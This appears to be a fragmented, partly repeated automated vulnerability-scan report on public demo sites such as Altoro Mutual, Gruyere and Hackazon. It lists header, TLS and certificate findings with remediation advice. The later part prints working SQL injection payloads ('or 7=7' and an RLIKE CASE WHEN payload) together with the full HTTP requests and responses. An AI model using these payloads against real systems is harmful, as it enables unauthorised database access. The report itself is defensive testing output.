CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:8443/bank/
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117:8443/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117:8443/retirement.htm
Remediation:
It's important that all documents served by the HTTP server declare the
correct character set for their encoding. The referenced links describe
the proper ways to indicate the character set encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider using a strict Content-Security-Policy header to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
482 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: demo.testfire.net
ip_address: 65.61.137.117
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Example of response header use:
Strict-Transport-Security: max-age=31536000
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
If external scripts are necessary to provide a particular service, then get
the scripts from the third party, review them for functionality and
integrity, and post them on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
Requesting the allowed HTTP OPTIONS from this host shows which
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
492 Enumerated Hostnames 0.0 Info Pass This list contains all hostnames discovered during the scan that are
believed to belong to this host.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
Hostname: altoromutual.com, Source: SSL Certificate Subject Common
Name
Hostname: altoromutual.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: www.altoromutual.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: demo.testfire.net, Source: SSL Certificate Subject
subjectAltName DNS
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider using a strict Content-Security-Policy header to
prevent Cross-Site Scripting issues.
This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https
Reference:
https://www.pcisecuritystandards.org/documents/Migrating_from_SSL_Early_TLS_Information%20Supplement_v1.pdf
https://www.pcisecuritystandards.org/pdfs/15_04_15%20PCI%20DSS%203%201%20Press%20Release.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/Bring-Out-Your-Dead--An-Update-on-the-PCI-relevance-of-SSLv3/?page=1&year=0&month=0
https://www3.trustwave.com/support/vulnerabilitymanagement/tls/
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : AES128-SHA
Cipher Suite: TLSv1 : DES-CBC3-SHA
Remediation:
The server should be configured to disable the use of the TLSv1.0
NOTE: Cipher block size must not be confused with key length. DES /
3DES ciphers are vulnerable because they always operate on 64 bit
blocks regardless of the key length. If this vulnerability is detected, and
in the list of detected ciphers you see only entries with numbers
different than 64 (eg. TLSv1 112 bits ECDHE-RSA-DES-CBC3-SHA), the
detection is still valid, because '112 bits' is the key length.
CVE: CVE-2016-2183
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
Cipher Suite: TLSv1 : DES-CBC3-SHA
Cipher Suite: TLSv1_1 : DES-CBC3-SHA
Cipher Suite: TLSv1_2 : DES-CBC3-SHA
Remediation:
This issue can be avoided by disabling block ciphers of 64 bit block
length (like DES/3DES) in all the SSL/TLS servers. Exact procedure
depends on the actual implementation. Please refer to the
documentation of your SSL/TLS server software and actual service
software (http server, mail server, etc).
NOTE 1: This finding is based on a live test that actually detects which
ciphers are supported by the server. It is very important to note that in
many cases, a software update (backported version provided by
Operating System vendor or "vanilla" release taken directly from
SSL/TLS vendor) won't be enough to resolve this issue. Usually software
update doesn't overwrite manually tweaked configuration files, which
means, DES/3DES can be still available, even if the software update
disables them by default.
NOTE 3: If disabling 64 bit block ciphers is not possible, please limit the
number of requests client can make in a single TLS session and / or the
3 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 Vulnerable to CBC Attacks via chosen-plaintext (BEAST) 4.3 Medium Fail Port: tcp/443
This server supports a version of SSL vulnerable to a Cipher Block
Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack, commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST"), takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such an attack.
CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https
Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers support TLS 1.1 and 1.2, enabled by
default, disabling previous versions may prevent services other than
HTTP from connecting to the server if they do not support these
versions of TLS.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.appspot.com
Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
http://www.openssl.org/docs/apps/ciphers.html
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : AES128-SHA
Cipher Suite: TLSv1 : DES-CBC3-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : AES128-SHA
Cipher Suite: TLSv1_1 : DES-CBC3-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : AES128-SHA
Cipher Suite: TLSv1_2 : DES-CBC3-SHA
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority G3
Certificate Chain Depth: 0
Expiration Date: 2019-10-21 18:23:00 UTC
Days to expiration: 76
Remediation:
Contact your Certificate Authority (CA) to have a new certificate issued
prior to the expiration date. Please note the port associated with this
finding. This finding may NOT be originating from port 443, which is
what most online testing tools check by default.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.thinkwithgoogle.com
Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority G3
Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
application_protocol: http
ip_address: 172.217.0.20
port_number: 80
transport_protocol: tcp
12 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: google-gruyere.appspot.com
ip_address: 172.217.0.20
13 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: google-gruyere.appspot.com
ip_address: 2607:F8B0:4009:813::2014
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.withyoutube.com
Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.
15 Host Detected 0.0 Info Pass This host responded to network probes.
Evidence:
hostname: google-gruyere.appspot.com
ip_address: 2607:F8B0:4009:813::2014
16 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: google-gruyere.appspot.com
ip_address: 172.217.0.20
17 Enumerated Hostnames 0.0 Info Pass This list contains all hostnames discovered during the scan that are
believed to belong to this host.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
Hostname: app.google, Source: SSL Certificate Subject subjectAltName DNS
Hostname: appspot.com, Source: SSL Certificate Subject subjectAltName DNS
Hostname: run.app, Source: SSL Certificate Subject subjectAltName DNS
Hostname: thinkwithgoogle.com, Source: SSL Certificate Subject subjectAltName DNS
Hostname: withgoogle.com, Source: SSL Certificate Subject subjectAltName DNS
Hostname: withyoutube.com, Source: SSL Certificate Subject subjectAltName DNS
Remediation:
No action is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Verified: true
Today: 2019-08-05 21:55:42 -0500
Start date: 2019-07-29 18:32:34 UTC
End date: 2019-10-21 18:23:00 UTC
Expired: false
Fingerprint: F5:29:C8:4C:78:6F:F6:43:49:91:22:B7:02:C4:08:E2
Subject: /C=US/ST=California/L=Mountain View/O=Google LLC/CN=*.appspot.com
Common name: *.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority G3
Signature Algorithm: sha256WithRSAEncryption
Version: 2
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
application_protocol: https
ip_address: 172.217.0.20
port_number: 443
ssl_enabled: true
transport_protocol: tcp
20 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 172.217.0.20
os_name: embedded
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://hackazon.webscantest.com/wishlist/new - type
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST https://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: https://hackazon.webscantest.com/wishlist
Origin: https://hackazon.webscantest.com
id=&name=New+Wish+List&type=or+7%3D7&_csrf_wishlist_add=Wz
up7LwI01S7dirlrNYtCePuKQ3QdAO9
True Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:15:41 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8
{"success":1,"id":"3188"}
False Request: POST https://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: https://hackazon.webscantest.com/wishlist
Origin: https://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=&name=New+Wish+List&type=or+7%3D6&_csrf_wishlist_add=Wz
up7LwI01S7dirlrNYtCePuKQ3QdAO9
False Response: HTTP/1.1 200 OK
{"success":1,"id":"3189"}
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVE-2017-3169, CVE-2017-3167
prior to 2.4.26 through 2.2.34 and 2.4.x prior to 2.4.26. These vulnerabilities are listed below.
CVE-2017-7679 - mod_mime can read one byte past its buffer when
used in a malicious Content-Type response header.
Reference:
https://httpd.apache.org/security/vulnerabilities_22.html
Evidence:
Match: '2.4.7' is greater than or equal to '2.4.0'
Match: '2.4.7' is less than '2.4.26'
Remediation:
Upgrade to the most recent version of Apache HTTP Server 2.2.34 for
2.2 users or 2.4.26 for 2.4 users.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://hackazon.webscantest.com/wishlist/new - type
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST http://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://hackazon.webscantest.com/wishlist
Origin: http://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=&name=New+Wish+List&type=or+7%3D7&_csrf_wishlist_add=U0z
tnjBA24QQ69yzqfMsDo0iHP4UVVo7
True Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:14:50 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8
id=&name=New+Wish+List&type=or+7%3D6&_csrf_wishlist_add=U0z
tnjBA24QQ69yzqfMsDo0iHP4UVVo7
False Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:14:50 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8
{"success":1,"id":"2581"}
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://hackazon.webscantest.com/wishlist/new - id
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST http://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://hackazon.webscantest.com/wishlist
Origin: http://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=or+7%3D7&name=New+Wish+List&type=private&_csrf_wishlist_a
dd=U0ztnjBA24QQ69yzqfMsDo0iHP4UVVo7
id=or+7%3D6&name=New+Wish+List&type=private&_csrf_wishlist_a
dd=U0ztnjBA24QQ69yzqfMsDo0iHP4UVVo7
{"success":1,"id":"2465"}
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
GET - https://hackazon.webscantest.com/product/view?id=or+7%3D6 -
id
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: GET
https://hackazon.webscantest.com/product/view?id=or+7%3D7
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Hackazon — Error: 404 Invalid product id</title>
<script type="text/javascript">
var App = window.App || {};
App.config =
{"host":"http:\/\/hackazon.webscantest.com","user":{"id":"473","userna
me":"CHSuser","first_name":"John","last_name":"Smith","user_phone":"
4085551234","email":"jsmith20@kelev.biz","created_on":"2019-08-05
20:02:57","photo":null,"photoUrl":null},"baseImgPath":"\/user_pictures\
/","dataType":"xml"};
</script>
<script src="/js/tools.js"></script>
<script src="/js/site.js"></script>
<script type="text/javascript">
// For version detection, set to min. required Flash Player version,
or 0 (or 0.0.0), for no version detection.
var swfVersionStr = "11.1.0";
// To use express install, set to playerProductInstall.swf, otherwise
the empty string.
var xiSwfUrlStr = "/swf/playerProductInstall.swf";
var flashvars = {
$(function () {
if ($('#flashBanner').length) {
setTimeout(function () {
swfobject.embedSWF(
"/swf/SliderBanner.swf", "flashBanner",
"360", "290",
swfVersionStr, xiSwfUrlStr,
flashvars, params, attributes);
// JavaScript enabled so display the flashContent div in
case it is not replaced with a swf object.
swfobject.createCSS("#flashBanner", "display:block;text-
align:left;");
}, 300);
}
});
</script>
</head>
<body class="">
<header class="hw-header">
<nav class="navbar hw-navbar navbar-fixed-top" role="navigation"
</div>
<div class="row error-page">
<div class="col-lg-12">
<p>Please try to change your request.</p>
</div>
</div>
</div> </div>
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Port: tcp/80
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
GET - http://69.164.223.171/category/view?id=%27+RLIKE+%28SELECT+%28CASE+WHEN+%2819%3D20%29+THEN+0x7465787476616c7565+ELSE+0x28+END%29%29--+ - id
False Injection: ' RLIKE (SELECT (CASE WHEN (19=20) THEN 0x7465787476616c7565 ELSE 0x28 END))--
True Injection: ' RLIKE (SELECT (CASE WHEN (19=19) THEN 0x7465787476616c7565 ELSE 0x28 END))--
